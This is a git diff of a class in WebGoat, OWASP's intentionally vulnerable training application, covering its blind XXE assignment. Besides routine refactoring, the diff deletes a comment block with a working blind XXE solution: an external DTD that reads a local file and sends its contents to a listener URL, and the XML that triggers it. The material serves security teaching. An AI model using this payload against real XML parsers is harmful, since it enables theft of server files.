@@ -1,19 +1,22 @@
 package org.owasp.webgoat.xxe;
 
-import com.google.common.base.Charsets;
-import com.google.common.io.Files;
-import lombok.SneakyThrows;
+import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AssignmentPath;
 import org.owasp.webgoat.assignments.AttackResult;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.MediaType;
-import org.springframework.web.bind.annotation.*;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RequestBody;
+import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
 
 import javax.annotation.PostConstruct;
 import java.io.File;
+import java.io.IOException;
+import java.nio.charset.StandardCharsets;
+import java.nio.file.Files;
 
 import static org.apache.commons.lang3.RandomStringUtils.randomAlphabetic;
 
@@ -46,8 +49,9 @@ import static org.apache.commons.lang3.RandomStringUtils.randomAlphabetic;
  * @version $Id: $Id
  * @since November 18, 2016
  */
+@Slf4j
 @RestController
-@AssignmentHints({"xxe.blind.hints.1","xxe.blind.hints.2","xxe.blind.hints.3","xxe.blind.hints.4","xxe.blind.hints.5"})
+@AssignmentHints({"xxe.blind.hints.1", "xxe.blind.hints.2", "xxe.blind.hints.3", "xxe.blind.hints.4", "xxe.blind.hints.5"})
 public class BlindSendFileAssignment extends AssignmentEndpoint {
 
     static final String CONTENTS = "WebGoat 8.0 rocks... (" + randomAlphabetic(10) + ")";
@@ -57,13 +61,16 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
     private Comments comments;
 
     @PostConstruct
-    @SneakyThrows
     public void createSecretFileWithRandomContents() {
         File targetDirectory = new File(webGoatHomeDirectory, "/XXE");
         if (!targetDirectory.exists()) {
             targetDirectory.mkdir();
         }
-        Files.write(CONTENTS, new File(targetDirectory, "secret.txt"), Charsets.UTF_8);
+        try {
+            Files.writeString(new File(targetDirectory, "secret.txt").toPath(), CONTENTS, StandardCharsets.UTF_8);
+        } catch (IOException e) {
+            log.error("Unable to write 'secret.txt' to '{}", targetDirectory);
+        }
     }
 
     @PostMapping(path = "xxe/blind", consumes = MediaType.ALL_VALUE, produces = MediaType.APPLICATION_JSON_VALUE)
@@ -82,46 +89,4 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
         }
         return trackProgress(failed().build());
     }
-
-/**
-<?xml version="1.0"?>
-<!DOCTYPE comment [
-<!ENTITY % remote SYSTEM "http://localhost:9090/files/admin2/attack.dtd">
-%remote;
-]>
-<comment>  <text>test&send;</text></comment>
-**/
-    /**
-     * Solution:
-     *
-     * Create DTD:
-     *
-     * <pre>
-     *     <?xml version="1.0" encoding="UTF-8"?>
-     *     <!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
-     *     <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:9090/ping?text=%file;'>">
-     *      %all;
-     * </pre>
-     *
-     * This will be reduced to:
-     *
-     * <pre>
-     *     <!ENTITY send SYSTEM 'http://localhost:9090/ping?text=[contents_file]'>
-     * </pre>
-     *
-     * Wire it all up in the xml send to the server:
-     *
-     * <pre>
-     *  <?xml version="1.0"?>
-     *  <!DOCTYPE root [
-     *  <!ENTITY % remote SYSTEM "http://localhost:9090/WebWolf/files/test.dtd">
-     *  %remote;
-     *   ]>
-     *  <user>
-     *    <username>test&send;</username>
-     *  </user>
-     *
-     * </pre>
-     *
-     */
 }
